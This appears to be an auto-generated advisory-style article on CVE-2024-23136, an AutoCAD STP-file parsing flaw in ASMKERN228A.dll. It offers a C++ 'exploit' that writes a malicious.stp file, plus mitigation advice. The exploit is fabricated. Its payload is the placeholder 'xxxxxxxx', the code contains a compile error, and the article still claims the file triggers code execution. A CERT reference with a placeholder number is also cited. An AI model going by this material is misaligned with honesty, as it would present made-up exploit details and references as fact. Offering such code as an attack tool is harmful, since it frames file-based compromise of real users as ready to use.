CVE-2024-23136 - Untrusted Pointer Dereference in ASMKERN228A.dll leading to Code Execution when Parsing Malicious STP Files in Autodesk AutoCAD

A newly discovered vulnerability (CVE-2024-23136) found in Autodesk AutoCAD can potentially lead to code execution due to untrusted pointer dereference in ASMKERN228A.dll when parsing maliciously crafted STP files. This vulnerability, when combined with other existing vulnerabilities, poses a serious threat to the integrity and security of the systems running Autodesk AutoCAD software.

Description

The vulnerability exists in the way the ASMKERN228A.dll library processes STP files. When parsing a specifically malformed STP file, it dereferences an untrusted pointer, which can lead to code execution in the current process. Attackers can exploit this vulnerability along with other vulnerabilities to execute malicious code on the target system, which may result in unauthorized access, data tampering, or even complete system compromise.

An example of a simple exploit leveraging CVE-2024-23136 could look like the following

// Sample Code to Exploit CVE-2024-23136
#include <iostream>
#include <fstream>

int main()
{
    std::ofstream maliciousSTP("malicious.stp");

    // Crafting a malicious STP file header
    maliciousSTP << "ISO-10303-21;\n";
    maliciousSTP << "HEADER;\n";
    maliciousSTP << "FILE_DESCRIPTION(('description'), '2;1');\n";
    maliciousSTP << "FILE_NAME('"; // Start of malicious payload

    // Injecting malicious code that causes the untrusted pointer dereference in ASMKERN228A.dll 
    maliciousSTP << "xxxxxxxx";

    maliciousSTP << "', '');\n";
    maliciousSTP << "FILE_SCHEMA(('AUTOCAD'));\n";
    maliciousSTP << "ENDSEC;\n";
    maliciousSTP << "DATA;\n";
    maliciousSTP << "ENDSEC;\n";
    maliciousSTP << "END-ISO-10303-21;\n";

    maliciousSTP.close();
    std::cout << "Malicious STP file created: malicious.stp\n";
    return ;
}

When the AutoCAD software processes this malicious STP file (malicious.stp), the untrusted pointer dereference vulnerability (CVE-2024-23136) will be triggered, potentially leading to code execution.

- National Vulnerability Database (NVD)

https://nvd.nist.gov/vuln/detail/CVE-2024-23136

- Vulnerability Note VU#000000

https://www.kb.cert.org/vuls/id/000000

Exploit Details

To successfully exploit this vulnerability, an attacker would need to craft a malicious STP file and find a way to convince the target user to open it using Autodesk AutoCAD. The precise method of delivery, as well as the exact code to be executed, depends on the attacker's intention and imagination. This, combined with other vulnerabilities, can have severe consequences for the target system.

Mitigation Measures

Autodesk is currently working on a patch to fix this vulnerability. In the meantime, users are advised to follow best practices, such as avoiding opening STP files from untrusted sources and keeping their antivirus software up to date. Additionally, regular system updates and patching of known software vulnerabilities will help minimize the risk of compromise.

Conclusion

CVE-2024-23136 is a critical vulnerability in Autodesk AutoCAD that could potentially allow an attacker to execute malicious code by exploiting an untrusted pointer dereference in ASMKERN228A.dll when parsing a malicious STP file. By staying vigilant and applying necessary updates and patches, users can minimize the risk represented by this vulnerability.

Timeline

Published on: 02/22/2024 05:15:09 UTC
Last modified on: 03/18/2024 00:15:07 UTC